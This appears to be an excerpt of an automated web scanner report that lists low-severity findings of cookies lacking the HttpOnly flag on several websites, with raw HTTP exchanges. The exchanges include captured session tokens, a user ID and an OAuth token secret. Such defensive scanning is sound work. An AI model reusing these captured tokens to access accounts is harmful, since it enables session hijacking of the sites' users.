Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

14.51. http://newsguy.com/policy.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /policy.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=05a35e6e7093ee3ebb9435e70a8c4d46; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=05a35e6e7093ee3ebb9435e70a8c4d46; path=/
Content-Length: 56165
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Service Policy</title>
<meta NAME="description" CONTEN
...[SNIP]...

14.52. http://newsguy.com/services.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /services.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=054baa14c183ba1850baba7e413a8d17; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=054baa14c183ba1850baba7e413a8d17; path=/
Content-Length: 10374
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Services</title>
<meta NAME="description" CONTENT="Acc
...[SNIP]...

14.53. http://newsguy.com/teraton_features.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /teraton_features.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=00cdfc51a8924dd9f4e54a04bd892b1c; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /teraton_features.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:40 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00cdfc51a8924dd9f4e54a04bd892b1c; path=/
Content-Length: 11386
Cache-Control: private
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0053)https://acc.newsguy.com/cgi-bin/eroticusenet_purchase -->
<HTML><HEAD><TITLE>NewsGuy - TeraTon. Newsgroup Plugi
...[SNIP]...

14.54. http://newsguy.com/user_info.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsguy.com
Path:   /user_info.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session-id=0d3971146897da5b6739d06ddaf91c57; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user_info.asp?0.2662578278686851 HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:02:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d3971146897da5b6739d06ddaf91c57; path=/
Content-Length: 139
Expires: Mon, 24 Jan 2011 22:02:39 GMT
Cache-Control: no-cache
Content-Type: text/html


DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256
USERID=h02332
DNDDATA=200+6100000+0+0+2011012423+20110223+200+6100000+0+3050000
MAILDATA=

14.55. http://sonspring.com/journal/clearing-floats

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sonspring.com
Path:   /journal/clearing-floats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS918cc6b448652b9859114bc571796adc=5b964cf985014beec23ef0339032c9d8; expires=Thu, 17-Feb-2011 02:14:14 GMT; path=/; domain=.sonspring.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /journal/clearing-floats HTTP/1.1
Host: sonspring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:54 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Set-Cookie: SESS918cc6b448652b9859114bc571796adc=5b964cf985014beec23ef0339032c9d8; expires=Thu, 17-Feb-2011 02:14:14 GMT; path=/; domain=.sonspring.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:40:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12896

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />
<title>SonSpring | Clearing Floats
...[SNIP]...

14.56. http://sourceforge.net/softwaremap/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=c9a0c9e1734e82873111a96cf441cae9; expires=Mon, 07-Feb-2011 16:02:35 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-6
Set-Cookie: PHPSESSID=c9a0c9e1734e82873111a96cf441cae9; expires=Mon, 07-Feb-2011 16:02:35 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: lighttpd/1.4.26
Content-Length: 99039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Create Server: sfs-web-6 -->
<!--
~ SourceForge.net: Find and B
...[SNIP]...

14.57. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...

14.58. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • session=1295919344|1295919344; path=/; domain=.mookie1.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1295919344|1295919344; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

14.59. http://tenzing.fmpub.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tenzing.fmpub.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=o8r2d70fbt2a9rlrjcdd1sbkf5; path=/
  • ltuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
  • vuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?t=z&n=2671&kw=undefined&fleur_de_sel=7742680979426950 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 204 No Content
Date: Mon, 24 Jan 2011 22:20:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=o8r2d70fbt2a9rlrjcdd1sbkf5; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ltuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Set-Cookie: vuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Content-Length: 0
X-Server: adserver10.tor.fmpub.net
Connection: close
Content-Type: text/html; charset=UTF-8


14.60. http://themehybrid.com/themes/shadow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://themehybrid.com
Path:   /themes/shadow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11457

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...

14.61. http://thenextweb.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://thenextweb.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
  • bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
  • bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
x-backend: 127.0.0.1
Set-Cookie: PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 102006
Date: Tue, 25 Jan 2011 13:27:48 GMT
Age: 665
Connection: close
X-Cache: HIT

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>The Next Web | TNW is the International Source for Internet Ne
...[SNIP]...

14.62. http://tweetmeme.com/auth/login

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tweetmeme.com
Path:   /auth/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • oauth_token_secret=F8Jp4xd1ikqZ1oJAnt5JGDsnBEUPdV8pQBORg61Of0; path=/auth/; domain=.tweetmeme.com
  • redirect=http%3A%2F%2Ftweetmeme.com; expires=Tue, 25-Jan-2011 13:23:22 GMT; path=/auth/; domain=.tweetmeme.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auth/login?r=http%3A%2F%2Ftweetmeme.com HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:22 GMT
Content-Type: text/html
Connection: close
P3p: CP="CAO PSA"
Location: https://api.twitter.com/oauth/authenticate?oauth_token=Er6o8OOxPpkUaFRriG4oF5qpl530ytvIj1cQc1mehI
Set-Cookie: redirect=http%3A%2F%2Ftweetmeme.com; expires=Tue, 25-Jan-2011 13:23:22 GMT; path=/auth/; domain=.tweetmeme.com
Set-Cookie: oauth_token_secret=F8Jp4xd1ikqZ1oJAnt5JGDsnBEUPdV8pQBORg61Of0; path=/auth/; domain=.tweetmeme.com
X-Ads-Served-In: 8.6069107055664E-5
X-Served-In: 0.78739500045776
X-Served-By: h01
Content-Length: 0


14.63. http://twitter.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
  • guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:09:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910587-82359-30173
ETag: "9a6712df9e465f208b30f02c1f450eaf"
Last-Modified: Mon, 24 Jan 2011 23:09:47 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Content-Length: 43988
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

14.64. http://twitter.com/7News/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /7News/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
  • guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910395-49850-63408
ETag: "85cdef8719ba6d07512d0d99ffbc30f1"
Last-Modified: Mon, 24 Jan 2011 23:06:35 GMT
X-Runtime: 0.00972
Content-Type: text/html; charset=utf-8
Content-Length: 54324
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.65. http://twitter.com/7News/newsteam

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /7News/newsteam

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
  • guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-62168-50610
ETag: "da817aed8ad2f932b9830e8a84480989"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.57960
Content-Type: text/html; charset=utf-8
Content-Length: 57201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.66. http://twitter.com/7News/status/29619600551317504

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /7News/status/29619600551317504

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlMWUxNmY3YWFiZTFkMjk3MjM1NjU1ZjBkMzliNzg5%250AMTM6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL3N0YXR1%250Acy8yOTYxOTYwMDU1MTMxNzUwNDoHaWQiJTgzNTE4ZDU1NGI3NjIwMzE0Y2Ex%250AMWIzZGQ1MThmZjFlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIWLlGui0B--925e1e31fa9a3e0528e8a01d8e0ecb1f6fcb625d; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910352494991; path=/; expires=Mon, 31-Jan-11 23:05:52 GMT; domain=.twitter.com
  • guest_id=129591035323884356; path=/; expires=Wed, 23 Feb 2011 23:05:53 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/status/29619600551317504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

